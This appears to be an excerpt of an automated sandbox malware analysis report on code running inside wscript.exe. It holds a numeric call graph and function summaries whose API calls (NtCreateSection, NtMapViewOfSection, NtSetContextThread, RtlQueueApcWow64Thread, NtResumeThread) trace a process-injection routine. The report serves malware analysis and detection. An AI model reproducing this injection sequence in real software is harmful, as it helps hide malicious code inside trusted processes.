107097->107119 107100 4ada30d 107098->107100 107102 4ada331 107098->107102 107100->107089 107101 4ada2cf 107101->107089 107105 4ada412 107102->107105 107110 4ad9bb2 107102->107110 107104 4ada531 107107 4ada552 NtResumeThread 107104->107107 107105->107104 107106 4ada4a6 NtSetContextThread 107105->107106 107108 4ada4bd 107106->107108 107107->107091 107108->107104 107109 4ada51c RtlQueueApcWow64Thread 107108->107109 107109->107104 107111 4ad9bf7 107110->107111 107112 4ad9c66 NtCreateSection 107111->107112 107113 4ad9d4e 107112->107113 107114 4ad9ca0 107112->107114 107113->107105 107115 4ad9cc1 NtMapViewOfSection 107114->107115 107115->107113 107116 4ad9d0c 107115->107116 107116->107113 107117 4ad9d88 107116->107117 107118 4ad9dc5 NtClose 107117->107118 107118->107105 107119->107101 107120 4da2ad0 LdrInitializeThunk 107124 91f10d 107127 91b9d0 107124->107127 107128 91b9f6 107127->107128 107135 909d40 107128->107135 107130 91ba02 107131 91ba26 107130->107131 107143 908f30 107130->107143 107181 91a6b0 107131->107181 107138 909d4d 107135->107138 107184 909c90 107135->107184 107137 909d54 107137->107130 107138->107137 107196 909c30 107138->107196 107144 908f57 107143->107144 107596 90b1c0 107144->107596 107146 908f69 107600 90af10 107146->107600 107148 908f86 107155 908f8d 107148->107155 107671 90ae40 LdrLoadDll 107148->107671 107150 9090f2 107150->107131 107152 908ffc 107616 90f410 107152->107616 107154 909006 107154->107150 107156 91bf90 2 API calls 107154->107156 107155->107150 107604 90f380 107155->107604 107157 90902a 107156->107157 107158 91bf90 2 API calls 107157->107158 107159 90903b 107158->107159 107160 91bf90 2 API calls 107159->107160 107161 90904c 107160->107161 107628 90ca90 107161->107628 107163 909059 107164 914a50 8 API calls 107163->107164 107165 909066 107164->107165 107166 914a50 8 API calls 107165->107166 107167 909077 107166->107167 107168 909084 107167->107168 107169 9090a5 107167->107169 107638 90d620 107168->107638 107170 914a50 8 API calls 107169->107170 107176 9090c1 107170->107176 107174 908d00 23 API calls 107174->107150 107175 909092 107654 908d00 107175->107654 107180 9090e9 107176->107180 107672 90d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 107176->107672 107180->107174 107182 91af60 LdrLoadDll 107181->107182 107183 91a6cf 107182->107183 107215 918bc0 107184->107215 107188 909cb6 107188->107138 107189 909cac 107189->107188 107222 91b2b0 107189->107222 107191 909cf3 107191->107188 107233 909ab0 107191->107233 107193 909d13 107239 909620 LdrLoadDll 107193->107239 107195 909d25 107195->107138 107575 91b5a0 107196->107575 107199 91b5a0 LdrLoadDll 107200 909c5b 107199->107200 107201 91b5a0 LdrLoadDll 107200->107201 107202 909c71 107201->107202 107203 90f180 107202->107203 107204 90f199 107203->107204 107579 90b040 107204->107579 107206 90f1ac 107583 91a1e0 107206->107583 107209 909d65 107209->107130 107211 90f1d2 107212 90f1fd 107211->107212 107589 91a260 107211->107589 107214 91a490 2 API calls 107212->107214 107214->107209 107216 918bcf 107215->107216 107217 914e50 LdrLoadDll 107216->107217 107218 909ca3 107217->107218 107219 918a70 107218->107219 107240 91a600 107219->107240 107223 91b2c9 107222->107223 107243 914a50 107223->107243 107225 91b2e1 107226 91b2ea 107225->107226 107282 91b0f0 107225->107282 107226->107191 107228 91b2fe 107228->107226 107300 919f00 107228->107300 107552 907ea0 107233->107552 107235 909ad1 107235->107193 107236 909aca 107236->107235 107565 908160 107236->107565 107239->107195 107241 91af60 LdrLoadDll 107240->107241 107242 918a85 107241->107242 107242->107189 107244 914d85 107243->107244 107254 914a64 107243->107254 107244->107225 107247 914b7d 107247->107225 107248 914b90 107311 91a360 107248->107311 107249 914b73 107370 91a460 LdrLoadDll 107249->107370 107252 914bb7 107253 91bdc0 2 API calls 107252->107253 107256 914bc3 107253->107256 107254->107244 107308 919c50 107254->107308 107255 914d49 107258 91a490 2 API calls 107255->107258 107256->107247 107256->107255 107257 914d5f 107256->107257 107262 914c52 107256->107262 107379 914790 LdrLoadDll NtReadFile NtClose 107257->107379 107259 914d50 107258->107259 107259->107225 107261 914d72 107261->107225 107263 914cb9 107262->107263 107265 914c61 107262->107265 107263->107255 107264 914ccc 107263->107264 107372 91a2e0 107264->107372 107267 914c66 107265->107267 107268 914c7a 107265->107268 107371 914650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 107267->107371 107269 914c97 107268->107269 107270 914c7f 107268->107270 107269->107259 107328 914410 107269->107328 107316 9146f0 107270->107316 107273 914c70 107273->107225 107276 914c8d 107276->107225 107278 914d2c 107376 91a490 107278->107376 107280 914caf 107280->107225 107281 914d38 107281->107225 107283 91b101 107282->107283 107284 91b113 107283->107284 107285 91bd40 2 API calls 107283->107285 107284->107228 107286 91b134 107285->107286 107397 914070 107286->107397 107288 91b180 107288->107228 107289 91b157 107289->107288 107290 914070 3 API calls 107289->107290 107291 91b179 107290->107291 107291->107288 107429 915390 107291->107429 107293 91b20a 107294 91b21a 107293->107294 107523 91af00 LdrLoadDll 107293->107523 107439 91ad70 107294->107439 107297 91b248 107518 919ec0 107297->107518 107301 91af60 LdrLoadDll 107300->107301 107302 919f1c 107301->107302 107546 4da2c0a 107302->107546 107303 919f37 107305 91bdc0 107303->107305 107306 91b359 107305->107306 107549 91a670 107305->107549 107306->107191 107309 91af60 LdrLoadDll 107308->107309 107310 914b44 107309->107310 107310->107247 107310->107248 107310->107249 107312 91a37c NtCreateFile 107311->107312 107313 91af60 LdrLoadDll 107311->107313 107312->107252 107315 91a3b6 107312->107315 107313->107312 107317 91470c 107316->107317 107318 91a2e0 LdrLoadDll 107317->107318 107319 91472d 107318->107319 107320 914734 107319->107320 107321 914748 107319->107321 107322 91a490 2 API calls 107320->107322 107323 91a490 2 API calls 107321->107323 107324 91473d 107322->107324 107325 914751 107323->107325 107324->107276 107380 91bfd0 LdrLoadDll RtlAllocateHeap 107325->107380 107327 91475c 107327->107276 107329 91445b 107328->107329 107330 91448e 107328->107330 107332 91a2e0 LdrLoadDll 107329->107332 107331 9145d9 107330->107331 107335 9144aa 107330->107335 107333 91a2e0 LdrLoadDll 107331->107333 107334 914476 107332->107334 107340 9145f4 107333->107340 107336 91a490 2 API calls 107334->107336 107337 91a2e0 LdrLoadDll 107335->107337 107338 91447f 107336->107338 107339 9144c5 107337->107339 107338->107280 107342 9144e1 107339->107342 107343 9144cc 107339->107343 107393 91a320 LdrLoadDll 107340->107393 107346 9144e6 107342->107346 107347 9144fc 107342->107347 107345 91a490 2 API calls 107343->107345 107344 91462e 107348 91a490 2 API calls 107344->107348 107349 9144d5 107345->107349 107350 91a490 2 API calls 107346->107350 107355 914501 107347->107355 107381 91bf90 107347->107381 107351 914639 107348->107351 107349->107280 107352 9144ef 107350->107352 107351->107280 107352->107280 107363 914513 107355->107363 107384 91a410 107355->107384 107356 914567 107357 91457e 107356->107357 107392 91a2a0 LdrLoadDll 107356->107392 107359 914585 107357->107359 107360 91459a 107357->107360 107362 91a490 2 API calls 107359->107362 107361 91a490 2 API calls 107360->107361 107364 9145a3 107361->107364 107362->107363 107363->107280 107365 9145cf 107364->107365 107387 91bb90 107364->107387 107365->107280 107367 9145ba 107368 91bdc0 2 API calls 107367->107368 107369 9145c3 107368->107369 107369->107280 107370->107247 107371->107273 107373 91af60 LdrLoadDll 107372->107373 107374 914d14 107373->107374 107375 91a320 LdrLoadDll 107374->107375 107375->107278 107377 91af60 LdrLoadDll 107376->107377 107378 91a4ac NtClose 107377->107378 107378->107281 107379->107261 107380->107327 107394 91a630 107381->107394 107383 91bfa8 107383->107355 107385 91af60 LdrLoadDll 107384->107385 107386 91a42c NtReadFile 107385->107386 107386->107356 107388 91bbb4 107387->107388 107389 91bb9d 107387->107389 107388->107367 107389->107388 107390 91bf90 2 API calls 107389->107390 107391 91bbcb 107390->107391 107391->107367 107392->107357 107393->107344 107395 91af60 LdrLoadDll 107394->107395 107396 91a64c RtlAllocateHeap 107395->107396 107396->107383 107398 914081 107397->107398 107400 914089 107397->107400 107398->107289 107399 91435c 107399->107289 107400->107399 107524 91cf30 107400->107524 107402 9140dd 107403 91cf30 2 API calls 107402->107403 107407 9140e8 107403->107407 107404 914136 107406 91cf30 2 API calls 107404->107406 107410 91414a 107406->107410 107407->107404 107532 91cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 107407->107532 107533 91d060 107407->107533 107409 9141a7 107411 91cf30 2 API calls 107409->107411 107410->107409 107413 91d060 3 API calls 107410->107413 107412 9141bd 107411->107412 107414 9141fa 107412->107414 107416 91d060 3 API calls 107412->107416 107413->107410 107415 91cf30 2 API calls 107414->107415 107417 914205 107415->107417 107416->107412 107418 91d060 3 API calls 107417->107418 107424 91423f 107417->107424 107418->107417 107421 91cf90 2 API calls 107422 91433e 107421->107422 107423 91cf90 2 API calls 107422->107423 107425 914348 107423->107425 107529 91cf90 107424->107529 107426 91cf90 2 API calls 107425->107426 107427 914352 107426->107427 107428 91cf90 2 API calls 107427->107428 107428->107399 107430 9153a1 107429->107430 107431 914a50 8 API calls 107430->107431 107433 9153b7 107431->107433 107432 91540a 107432->107293 107433->107432 107434 9153f2 107433->107434 107435 915405 107433->107435 107436 91bdc0 2 API calls 107434->107436 107437 91bdc0 2 API calls 107435->107437 107438 9153f7 107436->107438 107437->107432 107438->107293 107539 91ac30 107439->107539 107442 91ac30 LdrLoadDll 107443 91ad8d 107442->107443 107444 91ac30 LdrLoadDll 107443->107444 107445 91ad96 107444->107445 107446 91ac30 LdrLoadDll 107445->107446 107447 91ad9f 107446->107447 107448 91ac30 LdrLoadDll 107447->107448 107449 91ada8 107448->107449 107450 91ac30 LdrLoadDll 107449->107450 107451 91adb1 107450->107451 107452 91ac30 LdrLoadDll 107451->107452 107453 91adbd 107452->107453 107454 91ac30 LdrLoadDll 107453->107454 107455 91adc6 107454->107455 107456 91ac30 LdrLoadDll 107455->107456 107457 91adcf 107456->107457 107458 91ac30 LdrLoadDll 107457->107458 107459 91add8 107458->107459 107460 91ac30 LdrLoadDll 107459->107460 107461 91ade1 107460->107461 107462 91ac30 LdrLoadDll 107461->107462 107463 91adea 107462->107463 107464 91ac30 LdrLoadDll 107463->107464 107465 91adf6 107464->107465 107466 91ac30 LdrLoadDll 107465->107466 107467 91adff 107466->107467 107468 91ac30 LdrLoadDll 107467->107468 107469 91ae08 107468->107469 107470 91ac30 LdrLoadDll 107469->107470 107471 91ae11 107470->107471 107472 91ac30 LdrLoadDll 107471->107472 107473 91ae1a 107472->107473 107474 91ac30 LdrLoadDll 107473->107474 107475 91ae23 107474->107475 107476 91ac30 LdrLoadDll 107475->107476 107477 91ae2f 107476->107477 107478 91ac30 LdrLoadDll 107477->107478 107479 91ae38 107478->107479 107480 91ac30 LdrLoadDll 107479->107480 107481 91ae41 107480->107481 107482 91ac30 LdrLoadDll 107481->107482 107483 91ae4a 107482->107483 107484 91ac30 LdrLoadDll 107483->107484 107485 91ae53 107484->107485 107486 91ac30 LdrLoadDll 107485->107486 107487 91ae5c 107486->107487 107488 91ac30 LdrLoadDll 107487->107488 107489 91ae68 107488->107489 107490 91ac30 LdrLoadDll 107489->107490 107491 91ae71 107490->107491 107492 91ac30 LdrLoadDll 107491->107492 107493 91ae7a 107492->107493 107494 91ac30 LdrLoadDll 107493->107494 107495 91ae83 107494->107495 107496 91ac30 LdrLoadDll 107495->107496 107497 91ae8c 107496->107497 107498 91ac30 LdrLoadDll 107497->107498 107499 91ae95 107498->107499 107500 91ac30 LdrLoadDll 107499->107500 107501 91aea1 107500->107501 107502 91ac30 LdrLoadDll 107501->107502 107503 91aeaa 107502->107503 107504 91ac30 LdrLoadDll 107503->107504 107505 91aeb3 107504->107505 107506 91ac30 LdrLoadDll 107505->107506 107507 91aebc 107506->107507 107508 91ac30 LdrLoadDll 107507->107508 107509 91aec5 107508->107509 107510 91ac30 LdrLoadDll 107509->107510 107511 91aece 107510->107511 107512 91ac30 LdrLoadDll 107511->107512 107513 91aeda 107512->107513 107514 91ac30 LdrLoadDll 107513->107514 107515 91aee3 107514->107515 107516 91ac30 LdrLoadDll 107515->107516 107517 91aeec 107516->107517 107517->107297 107519 91af60 LdrLoadDll 107518->107519 107520 919edc 107519->107520 107545 4da2df0 LdrInitializeThunk 107520->107545 107521 919ef3 107521->107228 107523->107294 107525 91cf40 107524->107525 107526 91cf46 107524->107526 107525->107402 107527 91bf90 2 API calls 107526->107527 107528 91cf6c 107527->107528 107528->107402 107530 91bdc0 2 API calls 107529->107530 107531 914334 107530->107531 107531->107421 107532->107407 107534 91cfd0 107533->107534 107535 91bf90 2 API calls 107534->107535 107536 91d02d 107534->107536 107537 91d00a 107535->107537 107536->107407 107538 91bdc0 2 API calls 107537->107538 107538->107536 107540 91ac4b 107539->107540 107541 914e50 LdrLoadDll 107540->107541 107542 91ac6b 107541->107542 107543 914e50 LdrLoadDll 107542->107543 107544 91ad17 107542->107544 107543->107544 107544->107442 107545->107521 107547 4da2c1f LdrInitializeThunk 107546->107547 107548 4da2c11 107546->107548 107547->107303 107548->107303 107550 91af60 LdrLoadDll 107549->107550 107551 91a68c RtlFreeHeap 107550->107551 107551->107306 107553 907eb0 107552->107553 107554 907eab 107552->107554 107555 91bd40 2 API calls 107553->107555 107554->107236 107556 907ed5 107555->107556 107557 907f38 107556->107557 107558 919ec0 2 API calls 107556->107558 107559 907f3e 107556->107559 107563 91bd40 2 API calls 107556->107563 107569 91a5c0 107556->107569 107557->107236 107558->107556 107561 907f64 107559->107561 107562 91a5c0 2 API calls 107559->107562 107561->107236 107564 907f55 107562->107564 107563->107556 107564->107236 107566 908176 107565->107566 107567 91a5c0 2 API calls 107566->107567 107568 90817e 107567->107568 107568->107193 107570 91a5dc 107569->107570 107571 91af60 LdrLoadDll 107569->107571 107574 4da2c70 LdrInitializeThunk 107570->107574 107571->107570 107572 91a5f3 107572->107556 107574->107572 107576 91b5c3 107575->107576 107577 90acf0 LdrLoadDll 107576->107577 107578 909c4a 107577->107578 107578->107199 107580 90b063 107579->107580 107582 90b0e0 107580->107582 107594 919c90 LdrLoadDll 107580->107594 107582->107206 107584 91af60 LdrLoadDll 107583->107584 107585 90f1bb 107584->107585 107585->107209 107586 91a7d0 107585->107586 107587 91af60 LdrLoadDll 107586->107587 107588 91a7ef LookupPrivilegeValueW 107587->107588 107588->107211 107590 91af60 LdrLoadDll 107589->107590 107591 91a27c 107590->107591 107595 4da2ea0 LdrInitializeThunk 107591->107595 107592 91a29b 107592->107212 107594->107582 107595->107592 107597 90b1f0 107596->107597 107598 90b040 LdrLoadDll 107597->107598 107599 90b204 107598->107599 107599->107146 107601 90af34 107600->107601 107673 919c90 LdrLoadDll 107601->107673 107603 90af6e 107603->107148 107605 90f3ac 107604->107605 107606 90b1c0 LdrLoadDll 107605->107606 107607 90f3be 107606->107607 107674 90f290 107607->107674 107610 90f3d9 107613 90f3e4 107610->107613 107614 91a490 2 API calls 107610->107614 107611 90f402 107611->107152 107612 90f3f1 107612->107611 107615 91a490 2 API calls 107612->107615 107613->107152 107614->107613 107615->107611 107617 90f43c 107616->107617 107693 90b2b0 107617->107693 107619 90f44e 107620 90f290 3 API calls 107619->107620 107621 90f45f 107620->107621 107623 90f469 107621->107623 107625 90f481 107621->107625 107622 90f474 107622->107154 107623->107622 107624 91a490 2 API calls 107623->107624 107624->107622 107626 91a490 2 API calls 107625->107626 107627 90f492 107625->107627 107626->107627 107627->107154 107629 90caa6 107628->107629 107630 90cab0 107628->107630 107629->107163 107631 90af10 LdrLoadDll 107630->107631 107632 90cb4e 107631->107632 107633 90cb74 107632->107633 107634 90b040 LdrLoadDll 107632->107634 107633->107163 107635 90cb90 107634->107635 107636 914a50 8 API calls 107635->107636 107637 90cbe5 107636->107637 107637->107163 107639 90d646 107638->107639 107640 90b040 LdrLoadDll 107639->107640 107641 90d65a 107640->107641 107697 90d310 107641->107697 107643 90908b 107644 90cc00 107643->107644 107645 90cc26 107644->107645 107646 90b040 LdrLoadDll 107645->107646 107647 90cca9 107645->107647 107646->107647 107648 90b040 LdrLoadDll 107647->107648 107649 90cd16 107648->107649 107650 90af10 LdrLoadDll 107649->107650 107651 90cd7f 107650->107651 107652 90b040 LdrLoadDll 107651->107652 107653 90ce2f 107652->107653 107653->107175 107656 908d14 107654->107656 107726 90f6d0 107654->107726 107667 908f25 107656->107667 107731 9143a0 107656->107731 107658 908d70 107658->107667 107734 908ab0 107658->107734 107661 91cf30 2 API calls 107662 908db2 107661->107662 107663 91d060 3 API calls 107662->107663 107664 908dc7 107663->107664 107665 907ea0 4 API calls 107664->107665 107664->107667 107669 90c7b0 18 API calls 107664->107669 107670 908160 2 API calls 107664->107670 107739 90f670 107664->107739 107743 90f080 21 API calls 107664->107743 107665->107664 107667->107131 107669->107664 107670->107664 107671->107155 107672->107180 107673->107603 107675 90f2aa 107674->107675 107683 90f360 107674->107683 107676 90b040 LdrLoadDll 107675->107676 107677 90f2cc 107676->107677 107684 919f40 107677->107684 107679 90f30e 107687 919f80 107679->107687 107682 91a490 2 API calls 107682->107683 107683->107610 107683->107612 107685 91af60 LdrLoadDll 107684->107685 107686 919f5c 107685->107686 107686->107679 107688 91af60 LdrLoadDll 107687->107688 107689 919f9c 107688->107689 107692 4da35c0 LdrInitializeThunk 107689->107692 107690 90f354 107690->107682 107692->107690 107694 90b2ba 107693->107694 107695 90b040 LdrLoadDll 107694->107695 107696 90b313 107695->107696 107696->107619 107698 90d327 107697->107698 107706 90f710 107698->107706 107702 90d39b 107703 90d3a2 107702->107703 107717 91a2a0 LdrLoadDll 107702->107717 107703->107643 107705 90d3b5 107705->107643 107707 90f735 107706->107707 107718 9081a0 107707->107718 107709 90d36f 107714 91a6e0 107709->107714 107710 914a50 8 API calls 107712 90f759 107710->107712 107712->107709 107712->107710 107713 91bdc0 2 API calls 107712->107713 107725 90f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 107712->107725 107713->107712 107715 91af60 LdrLoadDll 107714->107715 107716 91a6ff CreateProcessInternalW 107715->107716 107716->107702 107717->107705 107719 90829f 107718->107719 107720 9081b5 107718->107720 107719->107712 107720->107719 107721 914a50 8 API calls 107720->107721 107723 908222 107721->107723 107722 908249 107722->107712 107723->107722 107724 91bdc0 2 API calls 107723->107724 107724->107722 107725->107712 107727 914e50 LdrLoadDll 107726->107727 107728 90f6ef 107727->107728 107729 90f6f6 SetErrorMode 107728->107729 107730 90f6fd 107728->107730 107729->107730 107730->107656 107733 9143c6 107731->107733 107744 90f4a0 107731->107744 107733->107658 107735 91bd40 2 API calls 107734->107735 107736 908ad5 107735->107736 107737 908cea 107736->107737 107764 919880 107736->107764 107737->107661 107740 90f683 107739->107740 107812 919e90 107740->107812 107743->107664 107745 90f4bd 107744->107745 107751 919fc0 107745->107751 107748 90f505 107748->107733 107752 919fd6 107751->107752 107753 91af60 LdrLoadDll 107752->107753 107754 919fdc 107753->107754 107762 4da2f30 LdrInitializeThunk 107754->107762 107755 90f4fe 107755->107748 107757 91a010 107755->107757 107758 91af60 LdrLoadDll 107757->107758 107759 91a02c 107758->107759 107763 4da2d10 LdrInitializeThunk 107759->107763 107760 90f52e 107760->107733 107762->107755 107763->107760 107765 91bf90 2 API calls 107764->107765 107766 919897 107765->107766 107785 909310 107766->107785 107768 9198b2 107769 9198d9 107768->107769 107771 9198f0 107768->107771 107770 91bdc0 2 API calls 107769->107770 107772 9198e6 107770->107772 107773 91bd40 2 API calls 107771->107773 107772->107737 107774 91992a 107773->107774 107775 91bd40 2 API calls 107774->107775 107776 919943 107775->107776 107782 919be4 107776->107782 107791 91bd80 LdrLoadDll 107776->107791 107778 919bc9 107779 919bd0 107778->107779 107778->107782 107780 91bdc0 2 API calls 107779->107780 107781 919bda 107780->107781 107781->107737 107783 91bdc0 2 API calls 107782->107783 107784 919c39 107783->107784 107784->107737 107786 909335 107785->107786 107787 90acf0 LdrLoadDll 107786->107787 107788 909368 107787->107788 107790 90938d 107788->107790 107792 90cf20 107788->107792 107790->107768 107791->107778 107793 90cf4c 107792->107793 107794 91a1e0 LdrLoadDll 107793->107794 107795 90cf65 107794->107795 107796 90cf6c 107795->107796 107803 91a220 107795->107803 107796->107790 107800 90cfa7 107801 91a490 2 API calls 107800->107801 107802 90cfca 107801->107802 107802->107790 107804 91af60 LdrLoadDll 107803->107804 107805 91a23c 107804->107805 107811 4da2ca0 LdrInitializeThunk 107805->107811 107806 90cf8f 107806->107796 107808 91a810 107806->107808 107809 91af60 LdrLoadDll 107808->107809 107810 91a82f 107809->107810 107810->107800 107811->107806 107813 91af60 LdrLoadDll 107812->107813 107814 919eac 107813->107814 107817 4da2dd0 LdrInitializeThunk 107814->107817 107815 90f6ae 107815->107664 107817->107815

                                            Executed Functions

                                            Function 04ADA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction ID: 30d77a8122b9a0be4c15d2064dd31e72a998f64ceaeffbc863e0098e3f8e25da
                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction Fuzzy Hash: 0DF10074518A8C8FDBA5EF68C894AEEB7E0FF98304F40462AD44BD7254DF34A545CB41
                                            Function 04AD9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 4ad9baf-4ad9bfe call 4ad9102 212 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 209->212 213 4ad9c00 209->213 219 4ad9d5a-4ad9d68 212->219 220 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 212->220 215 4ad9c02-4ad9c0a 213->215 215->212 215->215 223 4ad9d0c-4ad9d4c 220->223 224 4ad9d52 220->224 226 4ad9d4e-4ad9d4f 223->226 227 4ad9d69-4ad9d6b 223->227 224->219 226->224 228 4ad9d6d-4ad9d72 227->228 229 4ad9d88-4ad9ddc call 4adcd62 NtClose 227->229 230 4ad9d74-4ad9d86 call 4ad9172 228->230 230->229
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: Section$CloseCreateView
                                            • String ID: @$@
                                            • API String ID: 1133238012-149943524
                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction ID: 3fb0b5f69dc53756ad27d96c275fa6c0ba0fb3f142f5bf1eccd04eb73c32b140
                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction Fuzzy Hash: 79617270518B488FDB58EF68D8856AABBE0FF98314F50062EE58BC3651DF35E441CB86
                                            Function 04AD9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 268 4ad9bb2-4ad9bef 269 4ad9bf7-4ad9bfe 268->269 270 4ad9bf2 call 4ad9102 268->270 271 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 269->271 272 4ad9c00 269->272 270->269 278 4ad9d5a-4ad9d68 271->278 279 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 271->279 274 4ad9c02-4ad9c0a 272->274 274->271 274->274 282 4ad9d0c-4ad9d4c 279->282 283 4ad9d52 279->283 285 4ad9d4e-4ad9d4f 282->285 286 4ad9d69-4ad9d6b 282->286 283->278 285->283 287 4ad9d6d-4ad9d72 286->287 288 4ad9d88-4ad9ddc call 4adcd62 NtClose 286->288 289 4ad9d74-4ad9d86 call 4ad9172 287->289 289->288
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: Section$CreateView
                                            • String ID: @$@
                                            • API String ID: 1585966358-149943524
                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction ID: 3e424f4e873533c0e93bbe9b76578c80174db02b195eee603551ed9a0a4bd61c
                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction Fuzzy Hash: 8E517FB0618B088FD758DF58D8956AABBE4FB88314F50062EE58EC3691DF35E441CB86
                                            Function 04ADA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction ID: dadb893f9530c6aa98e58827c6456c56b877b38b98650f81d1ebdf38d2b16dc4
                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction Fuzzy Hash: 8B512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41
                                            Function 0091A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 548 91a35a-91a35d 549 91a38c-91a3b1 NtCreateFile 548->549 550 91a35f 548->550 552 91a3b6-91a3bb 549->552 551 91a361-91a389 call 91af60 550->551 550->552 551->549
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00914BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00914BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0091A3AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 49fad434f0a1f55386e671611d7ec720c9013ca55772fad69b50bb1605ab51ed
                                            • Instruction ID: b66a71982161ea1e085a9e1341e22d96248f45f77fc2dfb09534257ebf8e008f
                                            • Opcode Fuzzy Hash: 49fad434f0a1f55386e671611d7ec720c9013ca55772fad69b50bb1605ab51ed
                                            • Instruction Fuzzy Hash: 7501D6B6201108AFCB04DF88CC91EEB33A9AF8C754F158208FA1897241DA30EC418BA0
                                            Function 0091A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 556 91a360-91a376 557 91a37c-91a3b1 NtCreateFile 556->557 558 91a377 call 91af60 556->558 560 91a3b6-91a3bb 557->560 558->557
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00914BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00914BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0091A3AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: ad5a85eb2a2bae17b90a3b862c8fac09414ebda6f18ac195f42305a71bd9fcb9
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: A7F0BDB2201208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Function 0091A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(00914D72,5EB65239,FFFFFFFF,00914A31,?,?,00914D72,?,00914A31,FFFFFFFF,5EB65239,00914D72,?,00000000), ref: 0091A455
                                            Memory Dump Source
